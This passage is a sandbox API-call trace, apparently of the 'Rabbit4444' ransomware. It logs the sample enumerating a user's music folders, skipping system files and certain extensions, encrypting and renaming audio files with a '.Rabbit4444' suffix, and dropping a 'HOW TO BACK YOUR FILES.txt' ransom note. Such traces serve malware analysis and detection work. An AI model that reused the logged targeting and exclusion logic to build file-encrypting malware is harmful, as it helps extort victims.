lpString2="Rabbit4444") returned 1 [0049.089] lstrlenW (lpString=".dll") returned 4 [0049.089] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0049.089] lstrlenW (lpString=".lnk") returned 4 [0049.089] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0049.089] lstrlenW (lpString=".ini") returned 4 [0049.089] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0049.090] lstrlenW (lpString=".sys") returned 4 [0049.090] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0049.090] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\mLo6a3P6q3fcpY\\oJFUvhouKderw.m4a" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\w29itxeg\\mlo6a3p6q3fcpy\\ojfuvhoukderw.m4a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.090] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.090] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14040046787) returned 1 [0049.090] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=58840) returned 1 [0049.090] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0049.090] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d10 [0049.090] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xe8e0, lpName=0x0) returned 0x298 [0049.090] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe8e0) returned 0x70000 [0049.091] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.091] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0049.092] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.092] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0049.092] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.092] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0049.092] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.092] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0049.092] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14040291414) returned 1 [0049.092] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0049.092] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d10 | out: hHeap=0xe0000) returned 1 [0049.092] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.093] CloseHandle (hObject=0x298) returned 1 [0049.093] CloseHandle (hObject=0x278) returned 1 [0049.096] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\mLo6a3P6q3fcpY\\oJFUvhouKderw.m4a.Rabbit4444") returned 81 [0049.096] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\mLo6a3P6q3fcpY\\oJFUvhouKderw.m4a" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\w29itxeg\\mlo6a3p6q3fcpy\\ojfuvhoukderw.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\mLo6a3P6q3fcpY\\oJFUvhouKderw.m4a.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\w29itxeg\\mlo6a3p6q3fcpy\\ojfuvhoukderw.m4a.rabbit4444"), dwFlags=0x1) returned 1 [0049.097] InterlockedExchangeAdd (in: Addend=0xff618, Value=58848 | out: Addend=0xff618) returned 19736160 [0049.097] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3477 [0049.097] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfff42c50, ftCreationTime.dwHighDateTime=0x1d4cdf9, ftLastAccessTime.dwLowDateTime=0x3dafef00, ftLastAccessTime.dwHighDateTime=0x1d4d333, ftLastWriteTime.dwLowDateTime=0x3dafef00, ftLastWriteTime.dwHighDateTime=0x1d4d333, nFileSizeHigh=0x0, nFileSizeLow=0xe5d8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="oJFUvhouKderw.m4a", cAlternateFileName="OJFUVH~1.M4A")) returned 0 [0049.097] FindClose (in: hFindFile=0x102a90 | out: hFindFile=0x102a90) returned 1 [0049.097] lstrcpyW (in: lpString1=0x130eba2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0049.097] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\mLo6a3P6q3fcpY\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\w29itxeg\\mlo6a3p6q3fcpy\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0049.098] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0049.098] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0049.099] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.099] CloseHandle (hObject=0x278) returned 1 [0049.099] CloseHandle (hObject=0x27c) returned 1 [0049.100] GetCurrentThreadId () returned 0xd98 [0049.100] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6450 [0049.100] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\Hg6ypigpHsR-XRiGigP", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\Hg6ypigpHsR-XRiGigP") returned="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\Hg6ypigpHsR-XRiGigP" [0049.100] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf1448 | out: hHeap=0xe0000) returned 1 [0049.100] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6448 | out: hHeap=0xe0000) returned 1 [0049.100] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\Hg6ypigpHsR-XRiGigP" | out: lpString1="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\Hg6ypigpHsR-XRiGigP") returned="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\Hg6ypigpHsR-XRiGigP" [0049.100] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\Hg6ypigpHsR-XRiGigP", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\Hg6ypigpHsR-XRiGigP\\") returned="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\Hg6ypigpHsR-XRiGigP\\" [0049.100] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\Hg6ypigpHsR-XRiGigP\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\Hg6ypigpHsR-XRiGigP\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\Hg6ypigpHsR-XRiGigP\\.BFC0E91B00AE8A0620D3" [0049.100] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\Hg6ypigpHsR-XRiGigP\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\hg6ypigphsr-xrigigp\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0049.101] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0049.104] FlushFileBuffers (hFile=0x27c) returned 1 [0049.105] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\Hg6ypigpHsR-XRiGigP\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0049.106] CloseHandle (hObject=0x27c) returned 1 [0049.106] lstrlenW (lpString="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\Hg6ypigpHsR-XRiGigP") returned 48 [0049.106] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0049.106] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\Hg6ypigpHsR-XRiGigP\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf038a4e0, ftCreationTime.dwHighDateTime=0x1d4cf7e, ftLastAccessTime.dwLowDateTime=0xdaca3d00, ftLastAccessTime.dwHighDateTime=0x1d4d1c0, ftLastWriteTime.dwLowDateTime=0xe696bd88, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102590 [0049.106] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.106] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.106] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0049.106] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0049.106] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf038a4e0, ftCreationTime.dwHighDateTime=0x1d4cf7e, ftLastAccessTime.dwLowDateTime=0xdaca3d00, ftLastAccessTime.dwHighDateTime=0x1d4d1c0, ftLastWriteTime.dwLowDateTime=0xe696bd88, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.106] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.106] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.107] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0049.107] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0049.107] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0049.107] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7037a9a0, ftCreationTime.dwHighDateTime=0x1d4d25b, ftLastAccessTime.dwLowDateTime=0x236f4ea0, ftLastAccessTime.dwHighDateTime=0x1d4ca3d, ftLastWriteTime.dwLowDateTime=0x236f4ea0, ftLastWriteTime.dwHighDateTime=0x1d4ca3d, nFileSizeHigh=0x0, nFileSizeLow=0xe656, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-edB1.wav", cAlternateFileName="")) returned 1 [0049.107] lstrcmpiW (lpString1="-edB1.wav", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.107] lstrcmpiW (lpString1="-edB1.wav", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.107] lstrcmpiW (lpString1="-edB1.wav", lpString2="Rabbit4444.exe") returned -1 [0049.107] lstrcmpiW (lpString1="-edB1.wav", lpString2=".") returned 1 [0049.107] lstrcmpiW (lpString1="-edB1.wav", lpString2="..") returned 1 [0049.107] lstrcmpiW (lpString1="-edB1.wav", lpString2="windows") returned -1 [0049.107] lstrcmpiW (lpString1="-edB1.wav", lpString2="bootmgr") returned 1 [0049.107] lstrcmpiW (lpString1="-edB1.wav", lpString2="pagefile.sys") returned -1 [0049.107] lstrcmpiW (lpString1="-edB1.wav", lpString2="boot") returned 1 [0049.107] lstrcmpiW (lpString1="-edB1.wav", lpString2="ids.txt") returned -1 [0049.107] lstrcmpiW (lpString1="-edB1.wav", lpString2="NTUSER.DAT") returned -1 [0049.107] lstrcpyW (in: lpString1=0x130eb9a, lpString2="-edB1.wav" | out: lpString1="-edB1.wav") returned="-edB1.wav" [0049.107] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\Hg6ypigpHsR-XRiGigP\\-edB1.wav", dwFileAttributes=0x0) returned 1 [0049.107] lstrlenW (lpString="-edB1.wav") returned 9 [0049.107] lstrlenW (lpString="Rabbit4444") returned 10 [0049.107] lstrcmpiW (lpString1="", lpString2="Rabbit4444") returned -1 [0049.107] lstrlenW (lpString=".dll") returned 4 [0049.107] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0049.108] lstrlenW (lpString=".lnk") returned 4 [0049.108] lstrcmpiW (lpString1=".wav", lpString2=".lnk") returned 1 [0049.108] lstrlenW (lpString=".ini") returned 4 [0049.108] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0049.108] lstrlenW (lpString=".sys") returned 4 [0049.108] lstrcmpiW (lpString1=".wav", lpString2=".sys") returned 1 [0049.108] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\Hg6ypigpHsR-XRiGigP\\-edB1.wav" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\hg6ypigphsr-xrigigp\\-edb1.wav"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.108] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.108] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14041860846) returned 1 [0049.108] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=58966) returned 1 [0049.108] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0049.108] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1017c0 [0049.108] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xe960, lpName=0x0) returned 0x298 [0049.108] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe960) returned 0x70000 [0049.110] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.110] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0049.110] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.110] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0049.110] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.110] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0049.110] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.110] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0049.110] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14042088627) returned 1 [0049.110] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0049.110] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1017c0 | out: hHeap=0xe0000) returned 1 [0049.110] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.111] CloseHandle (hObject=0x298) returned 1 [0049.111] CloseHandle (hObject=0x278) returned 1 [0049.113] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\Hg6ypigpHsR-XRiGigP\\-edB1.wav.Rabbit4444") returned 69 [0049.113] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\Hg6ypigpHsR-XRiGigP\\-edB1.wav" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\hg6ypigphsr-xrigigp\\-edb1.wav"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\Hg6ypigpHsR-XRiGigP\\-edB1.wav.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\hg6ypigphsr-xrigigp\\-edb1.wav.rabbit4444"), dwFlags=0x1) returned 1 [0049.114] InterlockedExchangeAdd (in: Addend=0xff618, Value=58976 | out: Addend=0xff618) returned 19795008 [0049.114] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3479 [0049.114] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe696bd88, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe696bd88, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe696bd88, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0049.114] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.114] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0049.114] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x573d9270, ftCreationTime.dwHighDateTime=0x1d4c685, ftLastAccessTime.dwLowDateTime=0x420c26c0, ftLastAccessTime.dwHighDateTime=0x1d4d0ce, ftLastWriteTime.dwLowDateTime=0x420c26c0, ftLastWriteTime.dwHighDateTime=0x1d4d0ce, nFileSizeHigh=0x0, nFileSizeLow=0x229b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2qH DKgW.mp3", cAlternateFileName="2QHDKG~1.MP3")) returned 1 [0049.114] lstrcmpiW (lpString1="2qH DKgW.mp3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.114] lstrcmpiW (lpString1="2qH DKgW.mp3", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.114] lstrcmpiW (lpString1="2qH DKgW.mp3", lpString2="Rabbit4444.exe") returned -1 [0049.114] lstrcmpiW (lpString1="2qH DKgW.mp3", lpString2=".") returned 1 [0049.114] lstrcmpiW (lpString1="2qH DKgW.mp3", lpString2="..") returned 1 [0049.114] lstrcmpiW (lpString1="2qH DKgW.mp3", lpString2="windows") returned -1 [0049.114] lstrcmpiW (lpString1="2qH DKgW.mp3", lpString2="bootmgr") returned -1 [0049.114] lstrcmpiW (lpString1="2qH DKgW.mp3", lpString2="pagefile.sys") returned -1 [0049.114] lstrcmpiW (lpString1="2qH DKgW.mp3", lpString2="boot") returned -1 [0049.114] lstrcmpiW (lpString1="2qH DKgW.mp3", lpString2="ids.txt") returned -1 [0049.114] lstrcmpiW (lpString1="2qH DKgW.mp3", lpString2="NTUSER.DAT") returned -1 [0049.114] lstrcpyW (in: lpString1=0x130eb9a, lpString2="2qH DKgW.mp3" | out: lpString1="2qH DKgW.mp3") returned="2qH DKgW.mp3" [0049.114] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\Hg6ypigpHsR-XRiGigP\\2qH DKgW.mp3", dwFileAttributes=0x0) returned 1 [0049.114] lstrlenW (lpString="2qH DKgW.mp3") returned 12 [0049.114] lstrlenW (lpString="Rabbit4444") returned 10 [0049.114] lstrcmpiW (lpString1="H DKgW.mp3", lpString2="Rabbit4444") returned -1 [0049.114] lstrlenW (lpString=".dll") returned 4 [0049.114] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0049.114] lstrlenW (lpString=".lnk") returned 4 [0049.114] lstrcmpiW (lpString1=".mp3", lpString2=".lnk") returned 1 [0049.115] lstrlenW (lpString=".ini") returned 4 [0049.115] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0049.115] lstrlenW (lpString=".sys") returned 4 [0049.115] lstrcmpiW (lpString1=".mp3", lpString2=".sys") returned -1 [0049.115] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\Hg6ypigpHsR-XRiGigP\\2qH DKgW.mp3" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\hg6ypigphsr-xrigigp\\2qh dkgw.mp3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.115] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.115] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14042552424) returned 1 [0049.115] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8859) returned 1 [0049.115] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0049.115] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0049.115] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x25a0, lpName=0x0) returned 0x298 [0049.115] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x25a0) returned 0x70000 [0049.116] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.116] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0049.116] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.116] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0049.116] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.116] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0049.116] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.116] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0049.116] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14042677345) returned 1 [0049.116] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0049.116] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0049.116] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.116] CloseHandle (hObject=0x298) returned 1 [0049.116] CloseHandle (hObject=0x278) returned 1 [0049.118] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\Hg6ypigpHsR-XRiGigP\\2qH DKgW.mp3.Rabbit4444") returned 72 [0049.118] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\Hg6ypigpHsR-XRiGigP\\2qH DKgW.mp3" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\hg6ypigphsr-xrigigp\\2qh dkgw.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\Hg6ypigpHsR-XRiGigP\\2qH DKgW.mp3.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\hg6ypigphsr-xrigigp\\2qh dkgw.mp3.rabbit4444"), dwFlags=0x1) returned 1 [0049.118] InterlockedExchangeAdd (in: Addend=0xff618, Value=8864 | out: Addend=0xff618) returned 19853984 [0049.118] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3481 [0049.118] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93aa2cf0, ftCreationTime.dwHighDateTime=0x1d4d0ad, ftLastAccessTime.dwLowDateTime=0x658bb10, ftLastAccessTime.dwHighDateTime=0x1d4ccf1, ftLastWriteTime.dwLowDateTime=0x658bb10, ftLastWriteTime.dwHighDateTime=0x1d4ccf1, nFileSizeHigh=0x0, nFileSizeLow=0xff4e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SiPc-hdOB.mp3", cAlternateFileName="SIPC-H~1.MP3")) returned 1 [0049.118] lstrcmpiW (lpString1="SiPc-hdOB.mp3", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.118] lstrcmpiW (lpString1="SiPc-hdOB.mp3", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.118] lstrcmpiW (lpString1="SiPc-hdOB.mp3", lpString2="Rabbit4444.exe") returned 1 [0049.118] lstrcmpiW (lpString1="SiPc-hdOB.mp3", lpString2=".") returned 1 [0049.118] lstrcmpiW (lpString1="SiPc-hdOB.mp3", lpString2="..") returned 1 [0049.118] lstrcmpiW (lpString1="SiPc-hdOB.mp3", lpString2="windows") returned -1 [0049.118] lstrcmpiW (lpString1="SiPc-hdOB.mp3", lpString2="bootmgr") returned 1 [0049.118] lstrcmpiW (lpString1="SiPc-hdOB.mp3", lpString2="pagefile.sys") returned 1 [0049.118] lstrcmpiW (lpString1="SiPc-hdOB.mp3", lpString2="boot") returned 1 [0049.118] lstrcmpiW (lpString1="SiPc-hdOB.mp3", lpString2="ids.txt") returned 1 [0049.119] lstrcmpiW (lpString1="SiPc-hdOB.mp3", lpString2="NTUSER.DAT") returned 1 [0049.119] lstrcpyW (in: lpString1=0x130eb9a, lpString2="SiPc-hdOB.mp3" | out: lpString1="SiPc-hdOB.mp3") returned="SiPc-hdOB.mp3" [0049.119] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\Hg6ypigpHsR-XRiGigP\\SiPc-hdOB.mp3", dwFileAttributes=0x0) returned 1 [0049.119] lstrlenW (lpString="SiPc-hdOB.mp3") returned 13 [0049.119] lstrlenW (lpString="Rabbit4444") returned 10 [0049.119] lstrcmpiW (lpString1="c-hdOB.mp3", lpString2="Rabbit4444") returned -1 [0049.119] lstrlenW (lpString=".dll") returned 4 [0049.119] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0049.119] lstrlenW (lpString=".lnk") returned 4 [0049.119] lstrcmpiW (lpString1=".mp3", lpString2=".lnk") returned 1 [0049.119] lstrlenW (lpString=".ini") returned 4 [0049.119] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0049.119] lstrlenW (lpString=".sys") returned 4 [0049.119] lstrcmpiW 